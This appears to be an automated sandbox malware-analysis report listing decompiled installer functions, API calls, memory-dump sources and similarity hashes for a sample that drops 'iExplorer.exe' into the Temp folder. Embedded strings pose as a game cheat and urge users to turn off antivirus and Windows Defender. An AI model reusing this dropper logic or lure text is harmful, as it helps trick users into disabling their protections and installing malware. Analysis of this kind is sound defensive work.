                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405538
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3213498283-3916508600
                                                                      • Opcode ID: 7391a88ae4d5829a42295bd6cd1696add51b0fc6b7a0626c0e887fc462c5307d
                                                                      • Instruction ID: 4bc5ae5270445c97bcf9d4c9e03ad6414130e553a4a2ecd39a2bde3a0734af95
                                                                      • Opcode Fuzzy Hash: 7391a88ae4d5829a42295bd6cd1696add51b0fc6b7a0626c0e887fc462c5307d
                                                                      • Instruction Fuzzy Hash: 44F02761D00F6936E73262682C44F7B5B9DDB55350F040437E200B61D492BC4C828FAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 61%
                                                                      			E00401D88() {
                                                                      				void* __esi;
                                                                      				int _t6;
                                                                      				signed char _t11;
                                                                      				struct HFONT__* _t14;
                                                                      				void* _t18;
                                                                      				void* _t24;
                                                                      				void* _t26;
                                                                      				void* _t28;
                                                                      
                                                                      				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                      				0x40afec->lfHeight =  ~(MulDiv(E00402A80(2), _t6, 0x48));
                                                                      				 *0x40affc = E00402A80(3);
                                                                      				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                      				 *0x40b003 = 1;
                                                                      				 *0x40b000 = _t11 & 0x00000001;
                                                                      				 *0x40b001 = _t11 & 0x00000002;
                                                                      				 *0x40b002 = _t11 & 0x00000004;
                                                                      				E004059C6(_t18, _t24, _t26, 0x40b008,  *((intOrPtr*)(_t28 - 0x20)));
                                                                      				_t14 = CreateFontIndirectA(0x40afec);
                                                                      				_push(_t14);
                                                                      				_push(_t26);
                                                                      				E00405902();
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t28 - 4));
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D8F
                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00401D96
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DA5
                                                                      • CreateFontIndirectA.GDI32(0040AFEC), ref: 00401DF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirect
                                                                      • String ID:
                                                                      • API String ID: 3272661963-0
                                                                      • Opcode ID: 426d0b1f7582ab83bc94716b84423147bbd52752709028eb5df2f6662aafffed
                                                                      • Instruction ID: 04b2cf0bb689a8d3b2a2f4ce8554febbdf72cd111feb48da76785613fd2833d3
                                                                      • Opcode Fuzzy Hash: 426d0b1f7582ab83bc94716b84423147bbd52752709028eb5df2f6662aafffed
                                                                      • Instruction Fuzzy Hash: 47F0AFB0958741AFE7019770AE0AB9B3F64E715309F008479F242BA1E2C7B900058FAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00404CB9(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                      				long _t22;
                                                                      
                                                                      				if(_a8 != 0x102) {
                                                                      					if(_a8 != 0x200) {
                                                                      						_t22 = _a16;
                                                                      						L7:
                                                                      						if(_a8 == 0x419 &&  *0x42a470 != _t22) {
                                                                      							 *0x42a470 = _t22;
                                                                      							E004059A4(0x42a488, 0x430000);
                                                                      							E00405902(0x430000, _t22);
                                                                      							E00401410(6);
                                                                      							E004059A4(0x430000, 0x42a488);
                                                                      						}
                                                                      						L11:
                                                                      						return CallWindowProcA( *0x42a478, _a4, _a8, _a12, _t22);
                                                                      					}
                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                      						L10:
                                                                      						_t22 = _a16;
                                                                      						goto L11;
                                                                      					}
                                                                      					_t22 = E00404638(_a4, 1);
                                                                      					_a8 = 0x419;
                                                                      					goto L7;
                                                                      				}
                                                                      				if(_a12 != 0x20) {
                                                                      					goto L10;
                                                                      				}
                                                                      				E00403DFB(0x413);
                                                                      				return 0;
                                                                      			}


                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00404CEF
                                                                      • CallWindowProcA.USER32 ref: 00404D5D
                                                                        • Part of subcall function 00403DFB: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: b5a6871f53b9aff14b78b0a402df012a51bafca8f90a4562a882f6af99847d63
                                                                      • Instruction ID: 50f0fb6b168824e55620476c7b8c1a6d0acc7f89a76eb432e7383bd4e3edd017
                                                                      • Opcode Fuzzy Hash: b5a6871f53b9aff14b78b0a402df012a51bafca8f90a4562a882f6af99847d63
                                                                      • Instruction Fuzzy Hash: B5118271500208EFDF216F51DC45A9B3629AF94369F00803BFA047A1D1C3BD89629B6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00402539(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                      				int _t5;
                                                                      				long _t7;
                                                                      				struct _OVERLAPPED* _t11;
                                                                      				intOrPtr* _t15;
                                                                      				void* _t17;
                                                                      				int _t21;
                                                                      
                                                                      				_t15 = __esi;
                                                                      				_t11 = __ebx;
                                                                      				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                      					_t7 = lstrlenA(E00402A9D(0x11));
                                                                      				} else {
                                                                      					E00402A80(1);
                                                                      					 *0x409fe8 = __al;
                                                                      				}
                                                                      				if( *_t15 == _t11) {
                                                                      					L8:
                                                                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                      				} else {
                                                                      					_t5 = WriteFile(E0040591B(_t17 + 8, _t15), " C:\Users\hardz\AppData\Local\Temp\iExplorer.exe", _t7, _t17 + 8, _t11);
                                                                      					_t21 = _t5;
                                                                      					if(_t21 == 0) {
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t17 - 4));
                                                                      				return 0;
                                                                      			}


                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 00402557
                                                                      • WriteFile.KERNEL32(00000000,?, C:\Users\user\AppData\Local\Temp\iExplorer.exe,00000000,?,?,00000000,00000011), ref: 00402576
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: FileWritelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                      • API String ID: 427699356-411568985
                                                                      • Opcode ID: 129f4101278f230a12e3b7b304108a9dcc6e5d2d001034f4fe4167e8a906c2aa
                                                                      • Instruction ID: 7e9b30a943740ca1d9d75b10bf5a8e3275fb52bd6939b3579fcd9685c4e40542
                                                                      • Opcode Fuzzy Hash: 129f4101278f230a12e3b7b304108a9dcc6e5d2d001034f4fe4167e8a906c2aa
                                                                      • Instruction Fuzzy Hash: 67F0E971A04242FFD700FBA59E49EAF76A48B00304F10043BB241F50C2C5FC4A458B6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004054E4(char* _a4) {
                                                                      				char* _t3;
                                                                      				char* _t4;
                                                                      
                                                                      				_t4 = _a4;
                                                                      				_t3 =  &(_t4[lstrlenA(_t4)]);
                                                                      				while( *_t3 != 0x5c) {
                                                                      					_t3 = CharPrevA(_t4, _t3);
                                                                      					if(_t3 > _t4) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				 *_t3 =  *_t3 & 0x00000000;
                                                                      				return _t3;
                                                                      			}


                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9B,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 004054EA
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9B,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5), ref: 004054F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1669384263
                                                                      • Opcode ID: 3c0d1a3bf7508682bebb89c4b52116236a06921ad673057ba2d2d542b10fa704
                                                                      • Instruction ID: be4cd192eb94556ab0fd8e7e6f7cb58a2315bfdb3d9c16d790827d1793bfce43
                                                                      • Opcode Fuzzy Hash: 3c0d1a3bf7508682bebb89c4b52116236a06921ad673057ba2d2d542b10fa704
                                                                      • Instruction Fuzzy Hash: 5FD0A7A3409D706AF3131214CC04B9F7A498F16300F094462F140A61D1C2781D818FAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004055F5(CHAR* _a4, CHAR* _a8) {
                                                                      				int _t10;
                                                                      				int _t15;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t15 = lstrlenA(_a8);
                                                                      				_t16 = _a4;
                                                                      				while(lstrlenA(_t16) >= _t15) {
                                                                      					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                      					_t10 = lstrcmpiA(_t16, _a8);
                                                                      					if(_t10 == 0) {
                                                                      						return _t16;
                                                                      					}
                                                                      					_t16 = CharNextA(_t16);
                                                                      				}
                                                                      				return 0;
                                                                      			}


                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 004055FC
                                                                      • lstrcmpiA.KERNEL32(?,?,?,?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 00405615
                                                                      • CharNextA.USER32(?), ref: 00405623
                                                                      • lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 0040562C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: d56a3fc7bb82f956f3a73290afb8f08812f40ea20b7eee9fc8f43816ba82b717
                                                                      • Instruction ID: afc3c169ec71fe51d0bbfcf79615922950c410aa52d851159d391602867c6ff0
                                                                      • Opcode Fuzzy Hash: d56a3fc7bb82f956f3a73290afb8f08812f40ea20b7eee9fc8f43816ba82b717
                                                                      • Instruction Fuzzy Hash: 89F0A736209D51DAD3125B255D04E6F6B95EF91354F64087AF044F2280D33698169BBB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.489130854.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.489103608.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000003.00000002.489293811.0000000000418000.00000004.00020000.sdmp
                                                                      • Associated: 00000003.00000002.489318917.0000000000419000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: #100
                                                                      • String ID:
                                                                      • API String ID: 1341478452-0
                                                                      • Opcode ID: 8e32c3df4a1d41e72366ed0a120761df4992f68703580c4cd9f94e6a82f34356
                                                                      • Instruction ID: a8a150b918f45f9d09cd08f32c0c265bffeeb3950bd1910e736fea6d78b8c839
                                                                      • Opcode Fuzzy Hash: 8e32c3df4a1d41e72366ed0a120761df4992f68703580c4cd9f94e6a82f34356
                                                                      • Instruction Fuzzy Hash: 9491DA6104E3C28FD7538BB49CA52917FB0AE03224B1E85EBC4C0DF0B3D26D584ADB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416C3D
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416C55
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416C98
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416CB0
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416CF3
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416D0B
                                                                      • #595.MSVBVM60(?,00000000,?,?,?), ref: 00416D4E
                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00416D66
                                                                      Strings
                                                                      • CLOSE PLEASE TRUN OFF ANTIVIRUS AND WINDOWS DEFENDER, xrefs: 00416C1B
                                                                      • contact VIP WA (08977743346), xrefs: 00416D2C
                                                                      • Cheat Actived, xrefs: 00416C76
                                                                      • www.Atlantica-bot.net, xrefs: 00416CD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.489130854.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.489103608.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000003.00000002.489293811.0000000000418000.00000004.00020000.sdmp
                                                                      • Associated: 00000003.00000002.489318917.0000000000419000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: #595FreeList__vba
                                                                      • String ID: CLOSE PLEASE TRUN OFF ANTIVIRUS AND WINDOWS DEFENDER$Cheat Actived$contact VIP WA (08977743346)$www.Atlantica-bot.net
                                                                      • API String ID: 3346922759-2653881717
                                                                      • Opcode ID: 2d9dd83fd7ef1c06943b5a54ebbfc68aad30056d9339d083e06d6b82f5b48f93
                                                                      • Instruction ID: fcd23605c29fe40837c11b06961aa58660b7c4ac389b54f33bd5c8f158c4a734
                                                                      • Opcode Fuzzy Hash: 2d9dd83fd7ef1c06943b5a54ebbfc68aad30056d9339d083e06d6b82f5b48f93
                                                                      • Instruction Fuzzy Hash: 0261A5B1D01249AFCB04CFD9DA84ADDBBF9EF48704F20851AE106BA154E7B46B09CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1581294901cc86c51f54e85ff2baf3533717f8912874b5b3dd6978a31d6e1ee6
                                                                      • Instruction ID: 8ba2d719f07c356e881faaca5606ffdb29de84db002ba53d79597917fe6fc985
                                                                      • Opcode Fuzzy Hash: 1581294901cc86c51f54e85ff2baf3533717f8912874b5b3dd6978a31d6e1ee6
                                                                      • Instruction Fuzzy Hash: 88E30260A0D7894FEB97E73885A472C2BE29F5F240B5640F7C45DCB2E7DC686C498722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P4J$T4J$X4J$\4J$`4J$d4J$h4J$t4J$x4J
                                                                      • API String ID: 0-2262923296
                                                                      • Opcode ID: eb3d20f0ecbc942c5c2a5d7224baf7d09c7445197ab326602f1fb299dc492d3b
                                                                      • Instruction ID: 75c716f3ad4946d92d159b68fd41bccac5ea54474b1d773307c6b492e45e374a
                                                                      • Opcode Fuzzy Hash: eb3d20f0ecbc942c5c2a5d7224baf7d09c7445197ab326602f1fb299dc492d3b
                                                                      • Instruction Fuzzy Hash: 04E1A5A1A0DBC94FE787E77848617647FF1AF5B250B5A41EBD08CCB1E7E8185C498322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P4J$P4J$T4J
                                                                      • API String ID: 0-1713122075
                                                                      • Opcode ID: e3296d075810168a2501e212f07bb920289f6e2033830ee386fbf5389b01616d
                                                                      • Instruction ID: 060587b8e6cbdadadc67c1e79c656b77f54c450aa5e0c19fe69147f36b2aef7a
                                                                      • Opcode Fuzzy Hash: e3296d075810168a2501e212f07bb920289f6e2033830ee386fbf5389b01616d
                                                                      • Instruction Fuzzy Hash: A2F1D2B0A0868A4FEB85AF7885A97BD3BC1EF5A340F554079E40DC72D3EE7C98458742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X4J$\4J$`4J
                                                                      • API String ID: 0-4271243753
                                                                      • Opcode ID: c4ac68da30fd81c0d94e959743b3c097cf19335438d44d7386c1df7e430546a8
                                                                      • Instruction ID: 8582dfc3a1fbd08e479e3935c3a9dc927a2f37e07e40e0f13da0c24bc7a1b3f3
                                                                      • Opcode Fuzzy Hash: c4ac68da30fd81c0d94e959743b3c097cf19335438d44d7386c1df7e430546a8
                                                                      • Instruction Fuzzy Hash: 38E183A0A0D7894FEB46DB7488607A93FE1AF5B344F5501E6D48DCB2D7DA6C5C48C322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \4J$`4J
                                                                      • API String ID: 0-1148600527
                                                                      • Opcode ID: 1619f1dcdef2fd81f6d07c13e15ce5e7076cfe96a36cab4cd674be8caf7ec848
                                                                      • Instruction ID: f57f470b01f471f0f4fecbcaf00a7a736159858b7bbdc1d7474d0c4a527d4271
                                                                      • Opcode Fuzzy Hash: 1619f1dcdef2fd81f6d07c13e15ce5e7076cfe96a36cab4cd674be8caf7ec848
                                                                      • Instruction Fuzzy Hash: EAC143A0A1D78D4FEB46EB7484607687BE1AF5B344F5501E6D08DCB2D7DE6C5C488322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (d[L$d4J
                                                                      • API String ID: 0-2102226810
                                                                      • Opcode ID: d3d5aa5202b8614c0947afb4807e7a8db74ca8b39f4579b97efb39c2057183cb
                                                                      • Instruction ID: 64e62c701c5fa6a988f9e71230167236d54969e522c94a64f3c94a1f09c174e0
                                                                      • Opcode Fuzzy Hash: d3d5aa5202b8614c0947afb4807e7a8db74ca8b39f4579b97efb39c2057183cb
                                                                      • Instruction Fuzzy Hash: FDC1C3A1A1CA894FEB45EF28C4957A83BD1FF4A300F5540BAE44DC72D3DE78A845C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \4J$`4J
                                                                      • API String ID: 0-1148600527
                                                                      • Opcode ID: 4346b10be2916943195101794f1942705e2f2aea3903e1851f3dea32e16a7446
                                                                      • Instruction ID: 91fe2008cc675500fb49bff6825e9e201d6703748dd17f99a12adeca60303f34
                                                                      • Opcode Fuzzy Hash: 4346b10be2916943195101794f1942705e2f2aea3903e1851f3dea32e16a7446
                                                                      • Instruction Fuzzy Hash: 41C141A0A1D78D4FEB46EB7484607683BE1AF5B344F9501EAD08DCB2D7DE685C448322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &$
                                                                      • API String ID: 0-3672554430
                                                                      • Opcode ID: 7d3c703847a831042b1a4d17d281321ade641e81596d2652a6dc8787ba601ab9
                                                                      • Instruction ID: e57e422eb7b04470cb8730b0ef0f5b58e1c1004816874025a5fecb399fab2b5d
                                                                      • Opcode Fuzzy Hash: 7d3c703847a831042b1a4d17d281321ade641e81596d2652a6dc8787ba601ab9
                                                                      • Instruction Fuzzy Hash: E751A371A1C7884FE745EB78C496779BBE1EF5A300F5400BEE489C7293DE689C458742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `4J
                                                                      • API String ID: 0-1829626429
                                                                      • Opcode ID: 438dd9a3ff82564c44a73971fb4a7be5bd6508dec40ee9fa401365285faaa575
                                                                      • Instruction ID: 24c31a18d34b90627042f2785e72ff186a0a39f5c14e7d261f4fd5161f00934d
                                                                      • Opcode Fuzzy Hash: 438dd9a3ff82564c44a73971fb4a7be5bd6508dec40ee9fa401365285faaa575
                                                                      • Instruction Fuzzy Hash: A8B13FA0A1D78D4FEB46EB7884707683BE19F5B344F9501EAD089CB6E7DE685C448322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `4J
                                                                      • API String ID: 0-1829626429
                                                                      • Opcode ID: 201ab12877e1501fabb9e3b10559069e747ee002b75553b38e21812208034c05
                                                                      • Instruction ID: 6effa6f6dfadc0aafa337a2629f5a5a53eec0358bd985f45b6047480d1d077af
                                                                      • Opcode Fuzzy Hash: 201ab12877e1501fabb9e3b10559069e747ee002b75553b38e21812208034c05
                                                                      • Instruction Fuzzy Hash: 1AA141A0A1D78D4FEB46EB7484707683BE19F5B344F9501EAD08DCB6E7DE685C448322
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t4J
                                                                      • API String ID: 0-4115309232
                                                                      • Opcode ID: 5aeaa147b91ac739c462bceb8d07cef1bacc4e0ae6e85e870ba11fcfd1627bc2
                                                                      • Instruction ID: 60b732bc7ca47b74fa03bad9c078185b23cd9bb75842c57cc551180aaee470df
                                                                      • Opcode Fuzzy Hash: 5aeaa147b91ac739c462bceb8d07cef1bacc4e0ae6e85e870ba11fcfd1627bc2
                                                                      • Instruction Fuzzy Hash: 53518DA050D38A4FE7429F74C8657A57FA0AF47314F4A45EAE44CCB2E3DBB85908C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (6hK
                                                                      • API String ID: 0-672053336
                                                                      • Opcode ID: a606f6eda5149336b267f718c03396814c3bbb0b126a37a645e0694818860e7d
                                                                      • Instruction ID: cdda27b3e1951a4314cf11299f6d9cb3d660f6182274793d6776814ad87604de
                                                                      • Opcode Fuzzy Hash: a606f6eda5149336b267f718c03396814c3bbb0b126a37a645e0694818860e7d
                                                                      • Instruction Fuzzy Hash: 0C01F77264C7855FD345DB7888E97747BE2FF9A221B0A00F6D088CB1A3DE58984A8721
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b73590ce40b0435815522cc4f066c51f8aa2baacd011a8a4947bd5fdc9c6ab7
                                                                      • Instruction ID: fd695eed65a97bc373a923bf1b2c81d4039e6786a7398291a0dd866b1cc45b6c
                                                                      • Opcode Fuzzy Hash: 7b73590ce40b0435815522cc4f066c51f8aa2baacd011a8a4947bd5fdc9c6ab7
                                                                      • Instruction Fuzzy Hash: 1D61B2A0F0D6890FEB46FB7485757AA67A2DF8A340F5640B6D04DCB7D7ED289C058321
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.278750807.00007FFAEE5E0000.00000040.00000001.sdmp, Offset: 00007FFAEE5E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b394c3d8ed8eadb3aa3f2a5b6db3bfbeb5d0bafcfedaf9c69d74123655ed2712
                                                                      • Instruction ID: 685cdd197fd7a7e921d960266061614667766e90dd5d13b8fa69af84513dc051
                                                                      • Opcode Fuzzy Hash: b394c3d8ed8eadb3aa3f2a5b6db3bfbeb5d0bafcfedaf9c69d74123655ed2712
                                                                      • Instruction Fuzzy Hash: E1512771B0CB494FEB89EB2C84A97B877D1EF59310F0541B9E44DC7293EE28A8458392
                                                                      Uniqueness

